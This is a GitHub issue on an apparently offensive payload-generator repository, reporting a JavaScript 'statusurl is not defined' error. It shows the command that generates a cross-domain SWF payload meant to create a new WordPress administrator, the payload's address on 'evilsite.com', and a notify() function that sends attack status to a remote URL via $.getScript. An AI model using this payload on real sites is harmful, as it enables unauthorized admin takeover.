Skip to content
This repository has been archived by the owner on Feb 9, 2022. It is now read-only.

JavaScript error on crossdomain payload: statusurl is not defined #2

Open
7a opened this issue Apr 23, 2013 · 0 comments
Open

JavaScript error on crossdomain payload: statusurl is not defined #2

7a opened this issue Apr 23, 2013 · 0 comments

Comments

@7a
Copy link

7a commented Apr 23, 2013

When I run the following:
./bin/genpayload.py -p wordpress/newadmin -t swf -P usernewpage=http://demosite.com/wordpress-3.2.1/wp-admin/user-new.php -o /var/www/wordpress_newadmin/

And then browse to the generated payload:
http://evilsite.com/wordpress_newadmin/index.html

I get the following JavaScript error message in the console:
ReferenceError: statusurl is not defined
if (statusurl.length > 0)

The bug seems to be in common.js:

function notify(status)
{
if (statusurl.length > 0)
{
nstatusurl = statusurl + '?status=' + escape(status);
$.getScript(nstatusurl);
}
};

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant